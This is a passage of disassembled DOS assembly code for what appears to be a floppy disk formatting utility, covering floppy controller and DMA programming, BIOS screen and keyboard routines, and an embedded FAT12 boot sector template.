jmp loc_122 -sub_7 endp - - -; -; SUBROUTINE -; - -sub_8 proc near - mov al,data_29 - cbw ; Convrt byte to word - mov di,ax - mov ds,data_25 - and byte ptr ds:hdsk0_media_st_[di],0EFh - mov byte ptr ds:dsk_motor_tmr_,2 - mov byte ptr ds:dsk_recal_stat_,0 - push cs - pop ds - retn -sub_8 endp - - -; -; SUBROUTINE -; - -sub_9 proc near - mov word ptr ds:[22Bh],cx - test byte ptr ds:[22Eh],20h ; ' ' - jz loc_ret_155 ; Jump if zero - pop ax - mov data_82,ax - jmp loc_126 - -loc_ret_155: - retn -sub_9 endp - - -; -; SUBROUTINE -; - -sub_10 proc near - mov ah,0Eh - mov bh,0 - int 10h ; Video display ah=functn 0Eh - ; write char al, teletype mode - retn -sub_10 endp - - -; -; SUBROUTINE -; - -sub_11 proc near - push ax - push bx - mov al,7 - call sub_10 - pop bx - pop ax - retn -sub_11 endp - - -; -; SUBROUTINE -; - -sub_12 proc near - call sub_7 - mov al,0B6h - out 43h,al ; port 43h, 8253 wrt timr mode - mov ax,180h - out 42h,al ; port 42h, 8253 timer 2 spkr - mov al,ah - out 42h,al ; port 42h, 8253 timer 2 spkr - in al,61h ; port 61h, 8255 port B, read - or al,3 - out 61h,al ; port 61h, 8255 B - spkr, etc 
- call sub_7 - in al,61h ; port 61h, 8255 port B, read - and al,0FCh - out 61h,al ; port 61h, 8255 B - spkr, etc - ; al = 0, disable parity - retn -sub_12 endp - - -; -; SUBROUTINE -; - -sub_13 proc near - mov ah,2 - mov dx,2000h - mov bh,data_104 - int 10h ; Video display ah=functn 02h - ; set cursor location in dx - retn -sub_13 endp - - -; -; SUBROUTINE -; - -sub_14 proc near - mov ah,2 - mov bh,0 - int 10h ; Video display ah=functn 02h - ; set cursor location in dx - call sub_15 - retn -sub_14 endp - - -; -; SUBROUTINE -; - -sub_15 proc near -loc_156: - cld ; Clear direction - lodsb ; String [si] to al - cmp al,0 - je loc_ret_157 ; Jump if equal - mov ah,0Eh - mov bh,0 - int 10h ; Video display ah=functn 0Eh - ; write char al, teletype mode - jmp short loc_156 - -loc_ret_157: - retn -sub_15 endp - - -; -; SUBROUTINE -; - -sub_16 proc near -loc_158: - mov ah,0 - int 16h ; Keyboard i/o ah=function 00h - ; get keybd char in al, ah=scan - cmp al,1Bh - jne loc_159 ; Jump if not equal - pop ax - jmp data_89 -loc_159: - cmp al,0Dh - jne loc_160 ; Jump if not equal - mov al,data_103 - jmp short loc_161 - db 90h -loc_160: - cmp al,30h ; '0' - jl loc_162 ; Jump if < - cmp al,data_102 - jg loc_162 ; Jump if > -loc_161: - and ax,7 - retn -loc_162: - call sub_11 - jmp short loc_158 -sub_16 endp - - -; -; SUBROUTINE -; - -sub_17 proc near - mov cx,0FA0h - shr cx,1 ; Shift w/zeros fill - cld ; Clear direction - lodsb ; String [si] to al - inc si - xchg ah,al -loc_163: - lodsb ; String [si] to al - dec cx - jz loc_165 ; Jump if zero - inc si - cmp ah,al - jne loc_164 ; Jump if not equal - inc bx - jmp short loc_163 -loc_164: - call sub_26 - jmp short loc_163 -loc_165: - call sub_26 - retn -sub_17 endp - - -; -; SUBROUTINE -; - -sub_18 proc near - push ds - push es - mov si,data_1e - mov di,data_16e - mov bx,0 - mov ds,cs:data_91 - mov es,cs:data_91 - call sub_17 - mov si,data_2e - mov bx,0 - call sub_17 - pop es - pop ds - retn -sub_18 endp - - -; -; SUBROUTINE -; - -sub_19 
proc near - mov ax,4ADh - mov data_93,ax - call sub_21 - retn -sub_19 endp - - -; -; SUBROUTINE -; - -sub_20 proc near - mov ax,6F7h - mov data_93,ax - call sub_21 - retn -sub_20 endp - - -; -; SUBROUTINE -; - -sub_21 proc near - push cx - push dx - push si - push di - push ax - xor di,di ; Zero register - mov si,cs:data_93 -loc_166: - lodsb ; String [si] to al - cmp al,1 - jne loc_169 ; Jump if not equal - lodsw ; String [si] to ax - mov cx,ax - test cl,80h - jz loc_167 ; Jump if zero - xchg ch,cl - and cx,7FFFh - lodsb ; String [si] to al - jmp short locloop_168 - db 90h -loc_167: - xchg al,ah - and cx,7Fh - -locloop_168: - call sub_25 - loop locloop_168 ; Loop if cx > 0 - - jmp short loc_170 - db 90h -loc_169: - call sub_25 -loc_170: - cmp di,0FA0h - jl loc_166 ; Jump if < - jnz loc_171 ; Jump if not zero - mov di,1 - jmp short loc_166 -loc_171: - pop ax - pop di - pop si - pop dx - pop cx - retn -sub_21 endp - - -; -; SUBROUTINE -; - -sub_22 proc near - push ds - mov ds,data_91 - mov si,data_4e - mov di,offset data_115 - mov cx,7 - cld ; Clear direction - repe cmpsw ; Rep zf=1+cx >0 Cmp [si] to es:[di] - pop ds - cmp cx,0 - jne loc_ret_172 ; Jump if not equal - mov data_92,0D5h - call sub_44 - -loc_ret_172: - retn -sub_22 endp - - -; -; SUBROUTINE -; - -sub_23 proc near - mov ah,0Fh - int 10h ; Video display ah=functn 0Fh - ; get state, al=mode, bh=page - ; ah=columns on screen - mov ah,3 - int 10h ; Video display ah=functn 03h - ; get cursor loc in dx, mode cx - mov data_104,bh - mov data_105,cx - mov data_106,dx - call sub_18 - retn -sub_23 endp - - -; -; SUBROUTINE -; - -sub_24 proc near - mov data_93,1000h - mov ax,data_91 - push ds - mov ds,ax - call sub_21 - pop ds - mov bh,data_104 - mov dx,data_106 - mov ah,2 - int 10h ; Video display ah=functn 02h - ; set cursor location in dx - mov ah,1 - mov cx,data_105 - int 10h ; Video display ah=functn 01h - ; set cursor mode in cx - retn -sub_24 endp - - -; -; SUBROUTINE -; - -sub_25 proc near - push es - mov 
es,cs:data_91 - mov dx,cs:data_90 - cli ; Disable interrupts - push ax -loc_173: - in al,dx ; port 0, DMA-1 bas&add ch 0 - test al,1 - jnz loc_173 ; Jump if not zero -loc_174: - in al,dx ; port 0, DMA-1 bas&add ch 0 - test al,1 - jz loc_174 ; Jump if zero - pop ax - mov es:[di],al - sti ; Enable interrupts - inc di - inc di - pop es - retn -sub_25 endp - - -; -; SUBROUTINE -; - -sub_26 proc near - cmp ah,1 - je loc_175 ; Jump if equal - cmp bx,0 - je loc_178 ; Jump if equal - cmp bx,1 - jne loc_175 ; Jump if not equal - xor bx,bx ; Zero register - xchg ah,al - stosb ; Store al to es:[di] - jmp short loc_179 - db 90h -loc_175: - push ax - inc bx - mov al,1 - stosb ; Store al to es:[di] - mov ax,bx - and bx,0FF80h - nop ;*ASM fixup - sign extn byte - jz loc_176 ; Jump if zero - or ax,8000h - xchg ah,al - stosw ; Store ax to es:[di] - jmp short loc_177 - db 90h -loc_176: - stosb ; Store al to es:[di] -loc_177: - xor bx,bx ; Zero register - pop ax -loc_178: - xchg ah,al -loc_179: - stosb ; Store al to es:[di] - retn -sub_26 endp - - -; -; SUBROUTINE -; - -sub_27 proc near - mov al,data_110 - mul data_111 ; ax = data * al - add ax,3Dh - mov di,ax - mov al,data_112 - mov cl,15h -loc_180: - call sub_25 - dec cl - cmp cl,0 - jne loc_180 ; Jump if not equal - retn -sub_27 endp - - -; -; SUBROUTINE -; - -sub_28 proc near - mov ds,data_25 - cmp byte ptr ds:video_mode_,7 - je loc_183 ; Jump if equal - cmp byte ptr ds:video_mode_,2 - je loc_182 ; Jump if equal - cmp byte ptr ds:video_mode_,3 - je loc_182 ; Jump if equal -loc_181: - push cs - pop ds - stc ; Set carry flag - retn -loc_182: - push cs - pop ds - clc ; Clear carry flag - retn -loc_183: - mov ds,cs:data_91 - xor si,si ; Zero register - mov cx,50h - xor bx,bx ; Zero register - cld ; Clear direction - -locloop_184: - lodsw ; String [si] to ax - cmp ah,al - jne loc_185 ; Jump if not equal - inc bx -loc_185: - loop locloop_184 ; Loop if cx > 0 - - cmp bx,0Ah - jg loc_181 ; Jump if > - jmp short loc_182 -sub_28 endp - - 
-; -; SUBROUTINE -; - -sub_29 proc near - mov cx,2 - mov es,data_25 - cld ; Clear direction - cli ; Disable interrupts - rep movsw ; Rep when cx >0 Mov [si] to es:[di] - sti ; Enable interrupts - retn -sub_29 endp - - -; -; SUBROUTINE -; - -sub_30 proc near - clc ; Clear carry flag - mov word ptr ds:[1F0h],es - mov es,data_25 - cmp ax,es:[di] - jne loc_186 ; Jump if not equal - push cs - pop ax - cmp ax,es:[di+2] - je loc_187 ; Jump if equal -loc_186: - stc ; Set carry flag -loc_187: - mov es,word ptr ds:[1F0h] - retn -sub_30 endp - - -; -; SUBROUTINE -; - -sub_31 proc near - mov data_100,0F5h - mov data_97,9 - mov data_95,1 -loc_188: - mov al,data_95 - cbw ; Convrt byte to word - mov word ptr ds:[1A9h],0 - mov word ptr ds:[1ABh],ax - call sub_32 - mov dh,byte ptr ds:[1AFh] - mov dl,7 - sub dl,dh - mov dh,data_97 - mov si,0EDh - call sub_14 - mov si,data_100 - mov di,3A0h - cld ; Clear direction - call sub_35 - inc di - call sub_35 - mov data_100,si - mov dh,data_97 - mov dl,14h - mov si,3A0h - call sub_14 - mov si,data_100 - lodsw ; String [si] to ax - mov word ptr data_98,ax - mov data_100,si - mov word ptr ds:[1A9h],0 - mov word ptr ds:[1ABh],ax - call sub_32 - mov dh,byte ptr ds:[1AFh] - mov dl,2Dh ; '-' - sub dl,dh - mov dh,data_97 - mov si,0EDh - call sub_14 - mov bl,50h ; 'P' - xor bh,bh ; Zero register - cmp data_31,0 - jne loc_189 ; Jump if not equal - shr bx,1 ; Shift w/zeros fill -loc_189: - dec bx - mov ax,2 - mul bx ; dx:ax = reg * ax - mov bl,data_56 - xor bh,bh ; Zero register - mul bx ; dx:ax = reg * ax - mov bl,data_53 - add ax,bx - mov bx,word ptr data_98 - cmp byte ptr ds:[2423h],1 - je loc_190 ; Jump if equal - shl bx,1 ; Shift w/zeros fill -loc_190: - sub ax,bx - mov bx,200h - mul bx ; dx:ax = reg * ax - mov word ptr ds:[1A9h],dx - mov word ptr ds:[1ABh],ax - call sub_32 - mov dh,byte ptr ds:[1AFh] - mov dl,44h ; 'D' - sub dl,dh - mov dh,data_97 - mov si,0EDh - call sub_14 - mov al,data_99 - cmp data_95,al - jne loc_191 ; Jump if not equal - 
call sub_13 - retn -loc_191: - inc data_95 - inc data_97 - jmp loc_188 -sub_31 endp - - -; -; SUBROUTINE -; - -sub_32 proc near - mov di,0EDh - call sub_33 - mov word ptr ds:[1ADh],bx - mov byte ptr ds:[1AFh],bl - jz loc_195 ; Jump if zero -loc_192: - cld ; Clear direction - or al,30h ; '0' - stosb ; Store al to es:[di] - mov word ptr ds:[1A5h],0 - mov word ptr ds:[1A7h],0 - push di - mov di,word ptr ds:[1B0h] - add di,word ptr ds:[1B2h] - call sub_34 - pop di - mov ax,word ptr ds:[1A7h] - sub word ptr ds:[1ABh],ax - jnc loc_193 ; Jump if carry=0 - dec word ptr ds:[1A9h] -loc_193: - mov ax,word ptr ds:[1A5h] - sub word ptr ds:[1A9h],ax - dec word ptr ds:[1ADh] - cmp word ptr ds:[1ADh],0 - je loc_195 ; Jump if equal - call sub_33 -loc_194: - cmp bx,word ptr ds:[1ADh] - je loc_192 ; Jump if equal - push ax - mov al,30h ; '0' - stosb ; Store al to es:[di] - pop ax - dec word ptr ds:[1ADh] - cmp word ptr ds:[1ADh],0 - jne loc_194 ; Jump if not equal -loc_195: - mov ax,word ptr ds:[1ABh] - or al,30h ; '0' - cld ; Clear direction - stosb ; Store al to es:[di] - mov al,0 - stosb ; Store al to es:[di] - retn -sub_32 endp - - -; -; SUBROUTINE -; - -sub_33 proc near - mov dx,word ptr ds:[1A9h] - mov ax,word ptr ds:[1ABh] - mov word ptr ds:[1B0h],0 - mov word ptr ds:[1B2h],0 - cmp dx,0 - jne loc_196 ; Jump if not equal - cmp ax,2710h - jb loc_197 ; Jump if below -loc_196: - mov bx,2710h - mov word ptr ds:[1B0h],8 - div bx ; ax,dx rem=dx:ax/reg -loc_197: - cmp ax,0Ah - jb loc_200 ; Jump if below - mov word ptr ds:[1B2h],6 - xor dx,dx ; Zero register - mov bx,offset 1C8h -loc_198: - cmp ax,[bx] - jge loc_199 ; Jump if > or = - sub word ptr ds:[1B2h],2 - sub bx,2 - jmp short loc_198 -loc_199: - mov bx,[bx] - div bx ; ax,dx rem=dx:ax/reg -loc_200: - mov bx,word ptr ds:[1B0h] - add bx,word ptr ds:[1B2h] - shr bx,1 ; Shift w/zeros fill - retn -sub_33 endp - - -; -; SUBROUTINE -; - -sub_34 proc near - and al,0Fh - cbw ; Convrt byte to word - push ax - mov bx,offset 1C2h - mov 
bx,[bx+di] - mul bx ; dx:ax = reg * ax - add word ptr ds:[1A7h],ax - jnc loc_201 ; Jump if carry=0 - inc dx -loc_201: - add word ptr ds:[1A5h],dx - mov bx,offset 1B4h - pop ax - mov bx,[bx+di] - mul bx ; dx:ax = reg * ax - add word ptr ds:[1A5h],ax - retn -sub_34 endp - - -; -; SUBROUTINE -; - -sub_35 proc near - lodsb ; String [si] to al - call sub_36 - stosw ; Store ax to es:[di] - lodsb ; String [si] to al - call sub_36 - stosw ; Store ax to es:[di] - retn -sub_35 endp - - -; -; SUBROUTINE -; - -sub_36 proc near - mov ah,al - and ah,0Fh - mov cl,4 - shr al,cl ; Shift w/zeros fill - and al,0Fh - cmp al,0Ah - jge loc_202 ; Jump if > or = - add al,30h ; '0' - jmp short loc_203 - db 90h -loc_202: - add al,37h ; '7' -loc_203: - cmp ah,0Ah - jge loc_204 ; Jump if > or = - add ah,30h ; '0' - jmp short loc_ret_205 - db 90h -loc_204: - add ah,37h ; '7' - -loc_ret_205: - retn -sub_36 endp - - -; -; SUBROUTINE -; - -sub_37 proc near - mov al,data_29 - mov bx,offset data_30 - cbw ; Convrt byte to word - add bx,ax - mov al,[bx] - mov data_31,ax - retn -sub_37 endp - - -; -; SUBROUTINE -; - -sub_38 proc near - mov ah,1 - mov cx,7 - int 10h ; Video display ah=functn 01h - ; set cursor mode in cx - mov ah,3 - mov bh,data_104 - int 10h ; Video display ah=functn 03h - ; get cursor loc in dx, mode cx - mov data_108,dh - mov data_109,dl - mov di,137h - mov data_101,0 -loc_206: - mov ah,0 - int 16h ; Keyboard i/o ah=function 00h - ; get keybd char in al, ah=scan - cmp al,0Dh - jne loc_207 ; Jump if not equal - retn -loc_207: - cmp al,1Bh - jne loc_208 ; Jump if not equal - pop ax - jmp loc_41 -loc_208: - cmp al,10h - je loc_209 ; Jump if equal - cmp ax,5300h - jne loc_210 ; Jump if not equal -loc_209: - call sub_41 - call sub_41 - jmp short loc_206 -loc_210: - cmp ax,4B00h - je loc_211 ; Jump if equal - cmp al,8 - jne loc_212 ; Jump if not equal -loc_211: - call sub_41 - jmp short loc_206 -loc_212: - cmp al,30h ; '0' - jb loc_213 ; Jump if below - cmp al,39h ; '9' - jg loc_213 ; 
Jump if > - cmp data_101,2 - je loc_213 ; Jump if equal - cld ; Clear direction - stosb ; Store al to es:[di] - inc data_101 - inc data_109 - call sub_10 - jmp short loc_206 -loc_213: - call sub_11 - jmp short loc_206 -sub_38 endp - - -; -; SUBROUTINE -; - -sub_39 proc near - mov si,offset data_33+6 ; (' ') -loc_214: - cmp al,0 - je loc_215 ; Jump if equal - add si,7 - dec al - jmp short loc_214 -loc_215: - mov di,offset data_189 -loc_216: - lodsb ; String [si] to al - cmp al,0 - jne loc_217 ; Jump if not equal - retn -loc_217: - stosb ; Store al to es:[di] -sub_39 endp - - -; -; SUBROUTINE -; - -sub_40 proc near - jmp short loc_216 -sub_40 endp - - -; -; SUBROUTINE -; - -sub_41 proc near - cmp data_101,0 - je loc_ret_218 ; Jump if equal - dec di - dec data_101 - dec data_109 - call sub_42 - mov al,20h ; ' ' - call sub_10 - call sub_42 - -loc_ret_218: - retn -sub_41 endp - - -; -; SUBROUTINE -; - -sub_42 proc near - mov ah,2 - mov bh,data_104 - mov dh,data_108 - mov dl,data_109 - int 10h ; Video display ah=functn 02h - ; set cursor location in dx - retn -sub_42 endp - - -; -; SUBROUTINE -; - -sub_43 proc near - push ds - mov ds,data_91 - mov si,data_4e - mov di,offset data_115 - mov cx,7 - cld ; Clear direction - repe cmpsw ; Rep zf=1+cx >0 Cmp [si] to es:[di] - cmp cx,0 - je loc_219 ; Jump if equal - mov di,offset data_113 - mov si,data_4e - mov cx,6 - rep movsw ; Rep when cx >0 Mov [si] to es:[di] -loc_219: - pop ds - call sub_44 - mov di,offset data_115 - mov si,data_92 - mov cx,6 - rep movsw ; Rep when cx >0 Mov [si] to es:[di] - retn -sub_43 endp - - -; -; SUBROUTINE -; - -sub_44 proc near - push es - mov si,data_92 - mov es,data_91 - mov di,data_4e - mov cx,6 - rep movsw ; Rep when cx >0 Mov [si] to es:[di] - pop es - retn -sub_44 endp - - -; -; SUBROUTINE -; - -sub_45 proc near - call sub_28 - jnc loc_220 ; Jump if carry=0 - retn -loc_220: - call sub_43 - retn -sub_45 endp - - -; -; SUBROUTINE -; - -sub_46 proc near - call sub_28 - jnc loc_221 ; Jump if 
carry=0 - clc ; Clear carry flag - retn -loc_221: - cmp data_187,6666h - je loc_222 ; Jump if equal - mov data_92,3CEh - mov ah,data_65 - call sub_47 - mov byte ptr data_184+26h,al ; ('') - mov byte ptr data_184+28h,ah ; ('') - call sub_43 - retn -loc_222: - cmp data_92,3AAh - jne loc_ret_223 ; Jump if not equal - mov data_92,0D5h - call sub_44 - -loc_ret_223: - retn -sub_46 endp - - -; -; SUBROUTINE -; - -sub_47 proc near - cmp ah,0Ah - jl loc_226 ; Jump if < - mov al,31h ; '1' -loc_224: - sub ah,0Ah - cmp ah,0Ah - jl loc_225 ; Jump if < - add al,1 - jmp short loc_224 -loc_225: - or ah,30h ; '0' - retn -loc_226: - or ah,30h ; '0' - mov al,20h ; ' ' - retn -sub_47 endp - - -; -; SUBROUTINE -; - -sub_48 proc near - cld ; Clear direction - mov di,offset 14Dh -loc_227: - mov al,data_65 - stosb ; Store al to es:[di] - mov al,data_64 - stosb ; Store al to es:[di] - mov al,data_66 - stosb ; Store al to es:[di] - mov al,2 - stosb ; Store al to es:[di] - inc data_66 - mov al,data_66 - cmp al,data_56 - jle loc_227 ; Jump if < or = - mov data_66,1 - retn -sub_48 endp - - -; -; SUBROUTINE -; - -sub_49 proc near - pop ax - mov word ptr ds:[221h],ax - mov data_82,21E2h - mov al,byte ptr ds:[21Ah] - mov data_66,al - mov data_68,28E9h - mov data_67,1FFh - mov data_69,4Ah ; 'J' - mov data_70,0C5h - mov data_85,27F1h - call sub_75 - mov data_82,220Dh - mov ax,word ptr ds:[242Ch] - mov cl,byte ptr ds:[21Ah] - add cl,al - cmp cl,data_56 - jle loc_228 ; Jump if < or = - inc data_64 - sub cl,data_56 -loc_228: - mov data_66,cl - call sub_75 - inc byte ptr ds:[21Ah] - jmp word ptr ds:[221h] - -; External Entry into Subroutine - -sub_50: - mov si,offset data_220 - mov cx,word ptr ds:[21Dh] - inc cx - sub cx,si - jbe loc_229 ; Jump if below or = - mov di,offset data_214 - cld ; Clear direction - repne movsb ; Rep zf=0+cx >0 Mov [si] to es:[di] - xor al,al ; Zero register - mov cx,1Bh - mov di,offset data_220 - repne stosb ; Rep zf=0+cx >0 Store al to es:[di] -loc_229: - add word ptr 
ds:[21Fh],200h - mov word ptr ds:[21Dh],0 - retn -sub_49 endp - - -; -; SUBROUTINE -; - -sub_51 proc near - mov al,data_65 - dec al - cbw ; Convrt byte to word - mov bl,4 - div bl ; al, ah rem = ax/reg - mov cl,ah - cbw ; Convrt byte to word - mov di,ax - rol cl,1 ; Rotate - add cl,data_64 - mov al,80h - ror al,cl ; Rotate - or byte ptr ds:[139h][di],al - retn -sub_51 endp - - -; -; SUBROUTINE -; - -sub_52 proc near - mov data_65,0 - mov data_64,0 - mov data_66,1 - mov data_94,0 - mov data_63,0 - mov data_59,0F6h - retn -sub_52 endp - - -; -; SUBROUTINE -; - -sub_53 proc near - xor al,al ; Zero register - mov cx,200h - mov di,offset data_214 - cld ; Clear direction - repne stosb ; Rep zf=0+cx >0 Store al to es:[di] - retn -sub_53 endp - - mov di,data_100 - mov ax,0D1BAh - cld ; Clear direction - stosw ; Store ax to es:[di] - stosw ; Store ax to es:[di] - mov ax,data_54 - stosw ; Store ax to es:[di] - mov data_100,di - inc data_95 - inc data_99 - retn - -; -; SUBROUTINE -; - -sub_54 proc near - mov word ptr data_98,0 - mov si,offset 139h - cld ; Clear direction -loc_230: - lodsb ; String [si] to al - mov cl,4 -loc_231: - mov ah,al - and ah,3 - cmp ah,3 - je loc_232 ; Jump if equal - cmp ah,0 - je loc_233 ; Jump if equal - mov bl,data_56 - call sub_57 - jmp short loc_233 - db 90h -loc_232: - mov bl,data_56 - shl bl,1 ; Shift w/zeros fill - call sub_57 -loc_233: - dec cl - jz loc_234 ; Jump if zero - shr al,1 ; Shift w/zeros fill - shr al,1 ; Shift w/zeros fill - jmp short loc_231 -loc_234: - cmp si,14Dh - jl loc_230 ; Jump if < - retn -sub_54 endp - - -; -; SUBROUTINE -; - -sub_55 proc near - push cx - mov al,byte ptr ds:[2423h] - cbw ; Convrt byte to word - mov bx,ax - mov al,data_53 - cbw ; Convrt byte to word - add ax,word ptr ds:[223h] - xor dx,dx ; Zero register - div bx ; ax,dx rem=dx:ax/reg - call sub_59 - xor dx,dx ; Zero register - mov bx,2 - div bx ; ax,dx rem=dx:ax/reg - call sub_58 - mov bx,3 - mul bx ; dx:ax = reg * ax - add ax,3 - add ax,cx - pop cx - 
retn -sub_55 endp - - -; -; SUBROUTINE -; - -sub_56 proc near - mov ah,data_95 - inc ah - call sub_47 - mov data_190,ax - retn -sub_56 endp - - -; -; SUBROUTINE -; - -sub_57 proc near - xor bh,bh ; Zero register - cmp data_56,9 - jne loc_235 ; Jump if not equal - clc ; Clear carry flag - rcr bx,1 ; Rotate thru carry - adc bx,0 -loc_235: - add word ptr data_98,bx - retn -sub_57 endp - - -; -; SUBROUTINE -; - -sub_58 proc near - cmp dx,0 - je loc_236 ; Jump if equal - mov cx,1 - retn -loc_236: - mov cx,dx - retn -sub_58 endp - - -; -; SUBROUTINE -; - -sub_59 proc near - test al,1 - jz loc_237 ; Jump if zero - mov word ptr ds:[229h],2 - retn -loc_237: - mov word ptr ds:[229h],0 - retn -sub_59 endp - - -; -; SUBROUTINE -; - -sub_60 proc near - mov di,offset 139h - xor al,al ; Zero register - mov cx,14h - cld ; Clear direction - repne stosb ; Rep zf=0+cx >0 Store al to es:[di] - retn -sub_60 endp - - -; -; SUBROUTINE -; - -sub_61 proc near - mov si,data_31 - mov bx,offset data_41 - mov al,[bx+si] - mov byte ptr ds:[2423h],al - mov bx,offset data_47 - mov al,[bx+si] - mov byte ptr ds:[242Bh],al - mov bx,offset data_39 - mov al,[bx+si] - mov data_71,al - mov bx,offset data_43 - mov al,[bx+si] - mov data_55,al - mov bx,offset data_44 - mov al,[bx+si] - mov data_56,al - and ax,0FFh - mov word ptr ds:[242Eh],ax - mov bx,offset data_45 - mov al,[bx+si] - mov data_57,al - mov bx,offset data_46 - mov al,[bx+si] - mov data_58,al - mov bx,offset data_52 - mov al,[bx+si] - mov data_53,al - shl si,1 ; Shift w/zeros fill - mov bx,offset data_48 - mov ax,[bx+si] - mov word ptr ds:[2427h],ax - mov bx,offset data_40 - mov ax,[bx+si] - mov data_61,ax - mov bx,offset data_37 - mov ax,[bx+si] - mov word ptr data_60,ax - mov bx,69h - mov ax,[bx+si] - mov word ptr ds:[2429h],ax - mov bx,offset data_50 - mov ax,[bx+si] - mov word ptr ds:[242Ch],ax - mov bx,offset data_51 - mov ax,[bx+si] - mov data_54,ax - mov ah,4 - int 1Ah ; Real time clock ah=func 04h - ; get date cx=year, dx=mon/day - 
mov word ptr ds:[243Fh],dx - cmp data_31,0 - jne loc_238 ; Jump if not equal - mov word ptr ds:[216h],143h - retn -loc_238: - mov word ptr ds:[216h],14Dh - retn -sub_61 endp - - jmp short loc_239 - nop - inc dx - inc si - dec di - push dx - dec bp - inc cx - push sp - and [bx+si],al - add al,[bx+si] - add [bx+si],ax - add al,[bx+si] - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add al,[bx+si] - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - sub [bx+si],ax - add [bx+si],al - add [bp+4Fh],cl - db ' NAME FAT12 ', 0Dh, 0Ah, ' ' - db 'Non-System Disk ...', 0Dh, 0Ah, ' ' - db 'Replace And Press Any Key When R' - db 'eady...', 0Dh, 0Ah, 0 -loc_239: - xor ax,ax ; Zero register - cli ; Disable interrupts - mov ss,ax - mov sp,7C00h - sti ; Enable interrupts - push cs - pop ds - mov si,data_234e - cld ; Clear direction -loc_240: - lodsb ; String [si] to al - test al,al - jz loc_241 ; Jump if zero - mov ah,0Eh - xor bx,bx ; Zero register - int 10h ; Video display ah=functn 0Eh - ; write char al, teletype mode - jmp short loc_240 -loc_241: - mov ah,0 - int 16h ; Keyboard i/o ah=function 00h - ; get keybd char in al, ah=scan - int 19h ; Bootstrap loader - db 347 dup (0) - db 55h,0AAh - -; -; SUBROUTINE -; - -sub_62 proc near - mov byte ptr ds:[22Fh],1 - mov ds,data_25 - mov al,0FFh - mov ds:dsk_motor_tmr_,al - mov al,ds:dsk_motor_stat_ - and al,0Fh - push cs - pop ds - cmp al,0 - je loc_242 ; Jump if equal - retn -loc_242: - mov cl,data_29 - mov al,10h - shl al,cl ; Shift w/zeros fill - mov ah,al - or al,cl - or al,0Ch - mov dx,3F2h - out dx,al ; port 3F2h, dsk0 contrl output - mov cl,4 - rol ah,cl ; Rotate - mov ds,data_25 - mov ds:dsk_motor_stat_,ah - push cs - pop ds - mov byte ptr ds:[22Dh],2 - call sub_7 - retn -sub_62 endp - - -; -; SUBROUTINE -; - -sub_63 proc near - pop ax - mov data_86,ax - call sub_62 - call sub_67 - jmp short loc_243 - db 90h - -; External Entry into Subroutine - -sub_64: - pop ax - mov 
data_86,ax - mov data_63,0 - call sub_62 - call sub_66 -loc_243: - call sub_79 - call sub_68 - jc loc_244 ; Jump if carry Set - jmp data_86 -loc_244: - clc ; Clear carry flag - jmp loc_123 -sub_63 endp - - -; -; SUBROUTINE -; - -sub_65 proc near - pop ax - mov data_88,ax - call sub_64 - test data_73,0C0h - jz loc_245 ; Jump if zero - call sub_64 - test data_73,0C0h - jz loc_245 ; Jump if zero - jmp loc_123 -loc_245: - mov al,data_65 - cmp data_31,0 - jne loc_246 ; Jump if not equal - shl al,1 ; Shift w/zeros fill -loc_246: - mov data_63,al - call sub_63 - jmp data_88 - -; External Entry into Subroutine - -sub_66: - mov ah,7 - call sub_71 - mov ah,data_29 - call sub_71 - retn -sub_65 endp - - -; -; SUBROUTINE -; - -sub_67 proc near - mov ah,0Fh - call sub_71 - mov ah,data_29 - call sub_71 - mov ah,data_63 - call sub_71 - retn -sub_67 endp - - -; -; SUBROUTINE -; - -sub_68 proc near - mov ah,8 - call sub_71 - call sub_70 - mov data_73,al - call sub_70 - mov data_72,al - retn -sub_68 endp - - -; -; SUBROUTINE -; - -sub_69 proc near - call sub_70 - mov data_73,al - call sub_70 - mov data_74,al - call sub_70 - mov data_75,al - call sub_70 - mov data_77,al - call sub_70 - mov data_78,al - call sub_70 - mov data_79,al - call sub_70 - mov data_80,al - retn -sub_69 endp - - -; -; SUBROUTINE -; - -sub_70 proc near - mov dx,3F4h - xor cx,cx ; Zero register - -locloop_247: - in al,dx ; port 3F4h, dsk0 cntrlr status - and al,0C0h - cmp al,0C0h - je loc_248 ; Jump if equal - loop locloop_247 ; Loop if cx > 0 - - pop ax - stc ; Set carry flag - retn -loc_248: - inc dx - in al,dx ; port 3F5h, dsk0 controlr data - clc ; Clear carry flag - retn -sub_70 endp - - -; -; SUBROUTINE -; - -sub_71 proc near - mov dx,3F4h - xor cx,cx ; Zero register - -locloop_249: - in al,dx ; port 3F4h, dsk0 cntrlr status - and al,0C0h - cmp al,80h - je loc_250 ; Jump if equal - loop locloop_249 ; Loop if cx > 0 - - pop ax - stc ; Set carry flag - retn -loc_250: - mov al,ah - inc dx - out dx,al ; port 
3F5h, dsk0 controlr data - clc ; Clear carry flag - retn -sub_71 endp - - -; -; SUBROUTINE -; - -sub_72 proc near - mov dx,3F7h - mov al,data_71 - out dx,al ; port 3F7h ??I/O Non-standard - retn -sub_72 endp - - -; -; SUBROUTINE -; - -sub_73 proc near - mov al,2 - out 0Ch,al ; port 0Ch, DMA-1 clr byte ptr - jmp short $+2 ; delay for I/O - mov al,ah - out 0Bh,al ; port 0Bh, DMA-1 mode reg - mov bx,data_68 - push cs - pop ax - mov cl,4 - rol ax,cl ; Rotate - mov ch,al - and al,0F0h - add ax,bx - jnc loc_251 ; Jump if carry=0 - inc ch -loc_251: - out 4,al ; port 4, DMA-1 bas&add ch 2 - jmp short $+2 ; delay for I/O - mov al,ah - out 4,al ; port 4, DMA-1 bas&add ch 2 - jmp short $+2 ; delay for I/O - mov al,ch - and al,0Fh - out 81h,al ; port 81h, DMA page reg ch 2 - mov ax,data_67 - out 5,al ; port 5, DMA-1 bas&cnt ch 2 - jmp short $+2 ; delay for I/O - mov al,ah - out 5,al ; port 5, DMA-1 bas&cnt ch 2 - jmp short $+2 ; delay for I/O - mov al,2 - out 0Ah,al ; port 0Ah, DMA-1 mask reg bit - retn -sub_73 endp - - -; -; SUBROUTINE -; - -sub_74 proc near - pop ax - mov data_86,ax - mov data_68,28E9h - mov data_67,1FFh - mov data_69,46h ; 'F' - mov data_70,0E6h - call sub_62 - call sub_72 - mov ah,data_69 - call sub_73 - call sub_76 - jc loc_252 ; Jump if carry Set - call sub_79 - call sub_69 - jc loc_252 ; Jump if carry Set - jmp data_86 -loc_252: - clc ; Clear carry flag - call sub_7 - jmp loc_123 -sub_74 endp - - -; -; SUBROUTINE -; - -sub_75 proc near - 